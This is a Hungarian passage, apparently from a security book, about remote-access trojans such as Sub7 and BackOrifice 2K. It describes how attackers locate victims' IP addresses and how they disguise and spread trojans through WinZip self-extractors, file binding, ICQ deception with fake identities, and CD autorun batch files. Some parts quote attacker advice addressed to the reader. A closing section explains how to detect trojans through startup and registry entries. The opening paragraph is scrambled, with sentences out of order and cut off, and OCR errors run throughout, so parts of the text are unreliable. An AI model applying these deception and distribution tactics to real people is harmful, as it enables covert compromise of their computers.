mondjuk átvitel közben IRC-n vagy ICQ-n keresztül. A legkönnyebben úgy lehet megkaparintani az aktuális IP-t. Hogy a kliens milyen funkciókat tud vezérelni. minden kapcsolódásnál egy másik. A különböző trójaiak leírása a továbbiakban következik.2.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. az e-mail mellékleteket. és a háttérben aktív legyen. zel a kliens az idegen számítógép irányítócentruma lesz. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét.3 Hogyan szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére.2 A kliens otthon marad. mint pl. ha a fertőzött számítógép a hálózatra. de nem leéli feltétlenül annak lennie.2. Az egyik legismertebb eset egy trójai elrejtése a Linux SÁTÁN 1. Ez megnehezíti a trójai szerver elérését. mert nem lehet tudni. Ez az eset is mutatja. és irányítani lehet azt. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. Ez a lépés többnyire az elhelyezéssel egybekötve történik. A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között fennálló kapcsolaton keresztül. DOS parancssor-ra váltunk. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). amellyel meghatározott IP-tartományokat lehet tapogatni. mint a CD-ROM-meghajtó nyitása. Ha a szerver automatikus értesítésre van beállítva. amelyen a SÁTÁN 1. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét. hogy maga a hacker is online legyen a megfelelő időben. megváltoztatta az Fpinget úgy. EzEgy másik lehetőség. ha nincs fennálló közveden online-kapcsolat. Már csak az kell. hogy a fertőzött számítógép egyáltalán online-ban van-e. és ott beírjuk: netstat . és megkapja a támadáshoz szükséges IP-címet. hogy az áldozataikhoz jussanak. amelyeket később még bemutatunk. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét. A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. és ha igen.0 programkódjában. tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. hogy a hackerek nem csak az ismert módokat. A szerver futtatása általában két lépésből áll. Először is aktiválni. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). automatikus értesítést adnak. Egy programozó hozzáfért egy fejlesztői géphez.0 forráskódja volt.n. 4. majd telepítem és konfigurálni kell a szervert a rendszeren. Ehhez a legtöbb trójainak integrált szkenneré is van. milyen IP cím alatt. A második lépésben el kell érni.

a WinZip-nek a programbeállításait is használják egyes hackerek. hogy értesítsenek. vagy be lehet építeni segédprogramokba. Egyes trójai kiteknek. mert annak a szándékait uralják. amelybe a szerver be van ágyazva. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről. . és máris van egy tökéletesen álcázott trójai. „A szervert mail-ekén.) együtt csomagolják össze a szervert. Ikon-kiosztás a szervernek Olyan programnak. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről. ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. Ezeket mindenki szívesen küldi és nézegeti. hogy kínálja a honlapján. mint például a Sub7-nek. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. pl. amennyiben az éppen online van. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. Ez akkor célszerű. 4.3.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. hanem a hobby-hackerek eljárásaiba is betekintünk. amint az áldozat online van. Ehhez minden ikon felhasználható. Hogy egy pillantást vethessünk a dolgok menetére." 4.3. hogy trójait rejtettél bele. 4. Ezek arra valók. ICQ-n vagy IRC-n keresztül küldjük.GiF. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. hogy bekösd a szervert. PC-felhasználóként mindenesetre ismernünk kell ezeket. hogy abból már igazi „gyűjtemény" áll össze. a szerver átküldi az aktuális IP-t a kliensnek. inkább más utakat választanak. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. . aki a szervert vezérli. ha hiányoznak a programozási ismereteik. mert ez a sikeres telepítés után azonnal törli a szervert. az IP-t. tehát képekkel. hogy az áldozat mit kíván. A profik például más programokba integrálják a trójaiakat. Ezután a melt server after installation szerver opció segít. vagy mail-ben küldi el az aktuális IP-t. attól függően. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. JPG. Az archív ártalmatlan önkicsomagoló fájllá változik. így tud a hacker célzottan rajtaütni a fertőzött számítógépen. A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg. amelybe a szervert ágyazzák. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. illetve az internettel. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). azt persze nem kell elmondani. különösen alkalmasak az animációk és a gag-programok. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. A stratégiák egy része valóban profinak is mondható. A trójaiak minden esetben veszélyesek. Tedd fel hasznos programként a honlapodra. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók.tál. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. vagy kérj meg egy baráti webmestert. hogy könnyen és gyorsan tudják terjeszteni. Ilyenkor egy új WinZip archívot készítenek. pl. Ha már így elterjeszted a szervert a nép körében. és más fájlokkal (képek stb. A hobby-hackerek. tehát EXE fájlokba. akkor nem rossz. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert. és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked. amire szükséged van.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre. sőt még a szerver ikonját is meg lehet változtatni.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz.

hogy feltűnjön. hogy mi rejtőzik egy ilyen fájl mögött. „Ha az áldozat tényleg gyanítja. és aztán egy nagyon kicsi fájllal megpróbálkozni.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. Ha a fájl küldéséhez az ICQ-t használjuk. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). Egy Autorun. amelyben olyan fogalmak. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását. hogy elfogadja a fájlt. Tehát akinek van egy kis tapasztalata. ez a trójai túl kicsi ahhoz. az könnyen kiszámolhatja magának. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt.jpg jelenik meg. ha kezdetnek elküldünk egy pár tiszta fájlt. akkor amilyen jól csak lehet. akkor is.jpg. mint hacker meg hasonlók garantáltan nem fordulnak elő. Ekkor reális az esélye annak. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. amelyen át más fájlokat lehet feltölteni és végrehajtani. A The Thing egy kis trójai.4. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. Ha a fájlt visszautasítja az ICQ-n keresztül. Megkeressük az áldozatot a trójai terjesztéséhez. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. Az áldozatot persze nem kényszerítjük. Mint már mondtuk. álcázzuk a saját identitásunkat. Nos. hiszen a kontaktlistát a beleegyezése nélkül bővítették. átvitelkor csak a photo. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. hogy az áldozat észreveszi a támadást.3. egyszerűen várni kell pár napot.3. Ha egy fájlt photo. Férfi áldozatokhoz általában a női identitás az ideális. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program. A The Thing ezzel szemben csak kb. Ilyen eset- ben már csak ártatlan kifogások segítenek.exe nek nevezünk el. és ez nem különösebben feltűnő. a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány. 40 Kbájt (nagyjából annyi. amire szükségünk lesz. ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre). Amint ez a fájl az áldozat gépén egyszer lefutott. Sokkal jobb. és hozzáfűzzük a kontaktlistához.4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. hogy a másiknak ehhez engedélyt kellene adnia. anélkül. hogy egy fájl mögött vírus vagy trójai rejtőzik. mint egy nagyobb kép). amely egy trójaira utal . valamit fecsegni. A legjobb. megnyílik egy hátsó kapu. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül. Álcázás az ICQ-val Ha lehet. amilyen például a The Thing. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker.inf fájlt. Ezen kívül az infóban minden személy IP-jét megmutatja. Ezzel egyidejűleg lehet online két vagy több UIN." 4. Ezt többnyire a közeli környezetben található célok megtámadásához választják. A CD-ROM-on megváltoztatja az Autorun.inf szövege. amelyek az ICQ-nak köszönhetően adódnak a hackereknek.

A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést. alkalmasabbak a vírusok. Esetünkben tehát a szervert is. a legtöbb ember ugyan kíváncsi. de technikailag nem elég képzett ahhoz. A hacker létrehoz egy mappát a lemezen. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít. egy vírus végülis sokkal sikeresebb. Emellett természetesen terjesztési stratégiát is kell fejleszteni. amelynél fontosabb a hozzáférés. amelyek magas rákattintási és ezzel installálási arányt garantálnak. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad. Természetesen egy trójaival jelentős károkat lehet okozni. és a szerver automatikusan elindul a játék bevezetőjével együtt. mint a rombolás. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun. milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát. és támadhatóvá teszi az áldozatot.inf fájl adatait és végrehajtja a fájlt. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés. és ekkor a következőképpen működik. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni.bat néven menti. anélkül. mert az ilyen tömeges fertőzések mind a tervezés. A batch-fájl elindítja a szervert anonimitása védi a tettest. Ha ezt a lemezt most megkapja a felhasználó. de ha csupán a nagy mértékű pusztítás a cél. A Film Data mappába másolja a tulajdonképpeni filmet (*. És mostanra már tudják. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában. Ebben a két esetben más késztetések vannak a háttérben. az egyik neve mondjuk Film Data. hogy észrevehető lenne.) válik igazán vonzóvá. a trójai is elindul. Fontosabbak a hálózati hozzáférési jelszavak stb.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető. a másiké Xxdata. mert a hordozó csak a tartalma révén (játék. A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. mint azt majd a következő fejezet mutatja. és elindítja a Film.MPEG fájlt). Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. Addig pedig a terv még csődöt is mondhat.3.3. amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen.Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába. de ha belegondolunk. amelyek úgy szaporodnak.a Kurnyikova-vírus jó példa a sikert ígérő környezetekre.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik. és Film. az internet-kapcsolat . a másik Xxdata mappába másolja a szervert. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek. hogy célzottan jelszavakat vagy hasonlókat kutasson ki. hogy a levelezési címlisták minden címére elküldik magukat. Ez a legegyszerűbben férgekkel (warm) érhető el. amelynek például Film a neve. Ebben a mappában létrehoz még két további mappát. 4. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni.3. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván . 4. és erre. mielőtt a megfelelő számú kihelyezés megtörténhetne.bat-ot.AVI vagy *. Persze azért ez a motívum sem zárható ki. Ehhez a Windows 9. Az @echo parancs szolgál arra.x automatikus lejátszás funkcióját használja ki a hacker. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek. feltört program stb. 4.

01!). illetve hogy még most is az. ha fontos adatokat veszítünk el.. amelyek „több mint elég" fertőzött rendszert jelentenek. nem kell mindjárt nekikezdeni a mulatságnak. azt az úgynevezett portszkennek mutatják. több fájlból áll. Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. amit a gép tulajdonosa is megtehet. a PCAnywher a Symantectől. Ismert remote access program pl.exe-t.0. Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén. . Áthelyezhetnél fájlokat. Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött. nagyobb hálózatokban. elsőként töröljük a C. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. Mindannyian tudjuk. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127. 4. és tovább tanulmányozhatnád a trójai sok funkcióját. ne nagyon bántsátok az áldozat adatait. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett. Amint hozzáférünk az áldozat adataihoz. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken.A legtöbben azonban. amint azt a következő. tulajdonképpen nem is tudják. hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. fogja.4 Sub7 . akik kísérletezés közben saját magukat fertőzik meg trójaival. és nézd meg az összes adatát.1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. Destruktív módon felhasználva. megváltoztathatnád a startlapját. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek. Egy olyan trójai. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok.egy trójai rémisztő lehetőségekkel A Sub7. egy backdoor-trójai. és törli a szervert!" Pillanatkép egy trójairól 4. Először túrd át pár napig az áldozat gépét. A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik. a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg.. akik csak úgy kísérletezgetnek egy kicsit ezzel.azért ez förtelmes lenne.4. azaz a remote access tool vagy remote administration tool. 1999 márciusában került a hálóra az első verziókban. hogy az már nem túl vidám dolog. az interneten található „szabályokból" is láthatjuk. mint a Sub7. Ez azt jelenti. \windows\netstat. információkat fűzhetnél dokumentumokhoz. Legyetek szívesek. A távkarbantartó szoftver. hogy valójában mit is akarnak kezdeni az áldozat gépén. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról.

állította a hackercsoport . amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet . UIM-kicsomagolás). Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. Las Vegasban.5 BackOrifice 2K . gombokkal. amellyel a szervert lehet konfigurálni. hanem kizárólag dokumentált Windows funkcióhívásokat. és hogy egy másik futtatható fájlhoz kapcsolódjon-e. amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. amely csaknem lehetetlenné teszi. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren. A BackOrifice célja . Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. jelszókikémlelés. bár azt nem ismerték el. és megkísérli a célrendszerre telepíteni a szervert. és új képességekkel bővítette. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t. hogy Sub7-es fertőzöttségről lehessen beszélni. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség. . hogy a trójai egyes funkcióit inicializálja. Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. Azt is meg lehet adni. A klienst teljesen hagyományos Windows-programként kell elképzelni. grafikus felülettel. Edit-Server Az Edit-Server egy kiegészítő program. A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát. hogy az átvitt adatok egy harmadikhoz kerüljenek. továbbá itt lehet meghatározni a szerver nevét is. hogy az a szervert az installáció előtt elrejtse.itt a port a futási időben derül ki). és irányítsa a fertőzött gépet. a port. menükkel és kiválasztómezőkkel. Itt lehet például rögzíteni.Hálózati eszköz vagy támadás a Microsoft ellen 1998. és hogy a felhasznált port rejtve legyen-e.A Sub7 szervere A szerver ahhoz szükséges. Ehhez jönnek egyes ICQ-beállítások (értesítés. 4. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e. és ezzel irányítóközpontként működhessen. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani.a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. hogy miként telepítse magát a célgépre a szerver. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. hogy Windows 9x alatt biztonsági problémák lennének. A Microsoft válasza nem váratott magára sokáig. A hackereket azonban ezek a dolgok nem nagyon érdekelhették. És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja. így például a magasfokú titkosítással.

Sőt bizonyos esetekben még ahhoz is vezethet. 4. nem vagyunk-e már magunk is fertőzöttek.5.exe Funkció Ez a szerver. Ezzel a programmal lehet fontos beállításokat (kódolás. a Rattler mailben elküldi az áldozat IP-jét. hogy különösebb ismeretekre lenne szükség róla.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie. Ha elindul. Fájl bo2k. hogy a szkenner ne törölje azonnal a fertőzött fájlokat. Ezt a gyártók gyakran nem állítják be előzetesen. hogy a rendszer használhatatlanná válik . Az első vizsgálat előtt figyeljünk arra. Ha a vírusvizsgáló nem talál fertőzött fájlokat. A Registry-be is bejegyzi magát úgy. az még messze nem jelenti azt.dll io_stcpio.6. de ez kódolja a TCP-csomagok headerét. hogy minden Windows-indításkor automatikusan aktiválódjon. amelyen a szerver és a kliens összekapcsolódnak. Ha a szerver csak egyszer is elindul. néhány dolgot még be kell állítani rajta (jelszó stb.1 Vírus. Fájlok és funkcióik együttműködése 4. Ha a vírusvizsgáló fertőzést talál.mint mondtuk . illetve a Registry-be. A SERPENT feladata. hogy ez állandóan aktualizálva legyen. A gyakorlatlan felhasználónak ez nehéznek tűnhet. port. Hogy az ilyen esetekben mit tehetünk. a gép már megfertőződött. hogy elkerüljük az esetleges károkat. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen. anélkül. és kisebb bővítéseket (pluginek) hozzáfűzni. amelyen a rendszerkönyvtárba másolódik stb.tekintsünk el az érintett fájlok törlésétől.exe szekötéséhez. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani. Vannak azonban olyan programok. felmerül a kérdés.4. Ez a plugin gondoskodik arról. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe.dll enc_serpent. srv_rattler.és megtévesztheti a víruskeresőt. és ez a vírusvizsgálónak jelentős problémákat okozhat. .vagy jobban mondva: a gép totál lefagy.) végezni a szerveren. A trójai rejtőzködhet . így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni. mert a szkennelés így túl sokáig tarthat. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg.). inkább kérjünk tanácsot szakembertől. Mobman például beépített egy ilyen funkciót a Sub7-be. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket. automatikusan a C:\Windows\System könyvtárba másolja magát. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet.6 így ismerjük fel a trójait a rendszerünkben Most. Arra is figyelnünk kell. Próbáljuk meg a fájlokat izolálni. Mielőtt a kliens a szerverrel kapcsolatba tudna lépni.exe A kliens a BO2K „látható" része. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat. a szerver neve. Továbbá feltétlenül szükséges. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. hogy fájlokat lehessen kicserélni. hogy az adatok kódoltan közlekedjenek a kliens és a szerver között. illetve karanténba tenni. Ha nem vagyunk biztosak magunkban. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd. hogy a számítógép tiszta. Először . Ezért szeretnék itt néhány lehetőséget bemutatni. bo2kgui.dll Funkció Lényegében ezek a szerver alapfunkciói.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. a megtisztítás különböző lehetőségeit fogja javasolni.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult. hiszen szinte naponta fedeznek fel új trójaiakat. azt a következő szakasz részletezi. mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen.

és esetleg programokat. Ez az indítási lehetőség azonban nagyon valószínűtlen.exe-t. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. mint az msconfig-nál. mert nagyon nagy a felfedezés valószínűsége. backup programok stb. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl.DOS-os hulladék. de a trójaiak is. ezt semmiképpen se töröljük! Az Explorer. A control. Menjünk egyszerűen a Start gombra. uninstallprogramok. aztán a Futtatás-ra. A sysedit-tel is sokat megtalálhatunk a fentiek közül. illetve parancsikonokat kell törölni. config. Az autoexec. Ezeket a trójaiakat azonban nehéz realizálni. Eddig alig ismertek olyan trójaiak.bat-ban felismerhető egy bejegyzés.ini bejegyzésein keresztül indítani a trójaiakat. helyette azonban ezt írjuk be: sysedit.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból.bat vagy control.ini-t. Hasznos segítség a Windows saját msconfig programja is. Autostart (Indítópult)-mappa . a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult).elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. A System. autoexec. mert ide is bejegyzi magát néhány ártalmatlan program. Itt megintcsak ajánlatos az óvatosság. vírusvizsgálók. és szerencsére nagyon ritkák is. Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk.ini .exe-vel lelhető fel. Járjunk el úgy. mielőtt bármit is törölnénk. A Win.6. amelyeket nem ismerünk. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől. ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő. 4. hogy ne legyenek rögtön láthatóak.ini .6. amelyet az utolsó rendszerindítás előtt töröltek. Gördítsük az alsó gördítősávot egyszerűen jobbra.exe nevű bejegyzés. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa.ini a Windows 3. ha a rendszerindítással együtt elindul. hát megemlítjük. System.) is használja. Az olyan rendszereknél.de ez is nagyon ritka. de nagyon ritka Ha a winstart.ini-t ugyanúgy nyitjuk meg szerkesztésre.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win.exe után azonban még további bejegyzések következhetnek. írjuk be a Start/Futtatásba a sysedit.exe-vel lehet megnézni és szerkeszteni.sys . Ez azt jelenti. Óvatosan! Itt már van egy Explorer.2 AutoRun bejegyzések Egy trójai csak akkor működik. hogy a szervernek a rendszer hátterében állandóan futnia kell. Itt aztán szokatlan dolgok után kell kutatni.3 Windows Registry .ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából. míg a sor végét is látjuk.bat . és egy trójait indíthatnának el. mint a Win. .ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg. Mivel azonban ez a lehetőség is adott.bat-ot is a sysedit. Több ablak is megnyílik szövegszerkesztő formában. winstart.4. Hogy ezt kizárjuk.sys szintén a sysedit. A config. Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult. Szükség esetén távolítsuk el a gyanús bejegyzéseket. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel. az illető ikonra duplán kattintva érjük el őket. és kényelmesen megváltoztathatunk. amelyek ezt az utat használnák.lehetséges. A trójaiak ritkán használják ezt a lehetőséget. mint a Windows NT. és írjuk be msconfig.

Eszközmeghajtónak álcázás Egy trójai. Itt is a Windows Registryt használják a program automatikus indításához. Ilyen esetben nem egyszerű a pontos azonosítás. aminek a törlése rendszerproblémákat okoz. Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. a shell paraméterrel. Gyanú esetén ne az egész bejegyzést távolítsuk el. Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. amögött egy trójai rejtőzhet.Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. mint már említettük. Végülis lehet az egy valódi meghajtó is. illetve a Windows-regisztráció. azonban egy „szokatlan" path-on: . Rendszerint azonban csak az itt megnevezett bejegyzések vannak. hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is. eszközmeghajtónak is álcázhatja magát. Itt is egy Registry-be került bejegyzést keresünk. Megnyílik egy program félelmetesen sok bejegyzéssel.

6. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez.exe kicserélése Csak a Schoolbm trójainál ismert. hogy kell elrejtőzni a Taskmanager elől.exe a C:\ -n azt eredményezhetné. Az eredeti Windows runonce. A program elindul. LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első.exet futtatja le (kétséges esetben a C:\ könyvtárban). Itt futtatható fájlokról van szó.0 trójai leírását. mert a legtöbb trójai „tudja". és először elvégez néhány vizsgálatot.exe mérete a Windows 95 alatt 11264 bájt. Tehát ha találunk egy runonce. „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy.com/ weboldalon található. mert tényleg mindent könyörtelenül megmutat.4 Módszerek az Explorer. amely a http://serdarka.exe-t egy módosított fájlra cseréli. A program neve: DrWatson. 4.8m. ami a Windows alatt adódik. Ezeket különböző módokon lehet megfigyelni. megtalált explorer. Megjelenik egy ablak. amely mutatja a futó programokat. A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét. Például a Ctrl+Alt+Del billentyűkkel. Menjünk a Nézet menüpontra. és válasszuk a Mindent megmutat opciót. akkor itt is el lehet rejtve egy trójai. hogy legközelebb egy trójai töltődik be. amelyeket ennek megfelelően be is lehet zárni.4.5 A runonce. amelyet a Taskmanager-rel együtt lehet elindítani. hogy a „futó feladatokat" ellenőrizzük. Hangsúlyozzuk. amely így lehetővé tesz egy autorun eljárást. Ez a módszer azonban egyáltalán nem biztos. mielőtt a tulajdonképpeni explorer. amelynek más a mérete. Az eredeti runonce. A Start menü Futtatás-ba írjuk be: drwatson. Kezdőknek azonban a DrWatson bonyolultnak tűnhet.exe-t. Windows 98/ME alatt pedig 40960 bájt. amelyek a rendszerrel „együtt futnak".6. . amely a C:\windows\system könyvtárban vagy máshol található. Az explorer.exe (C:\windows\) elindulna.

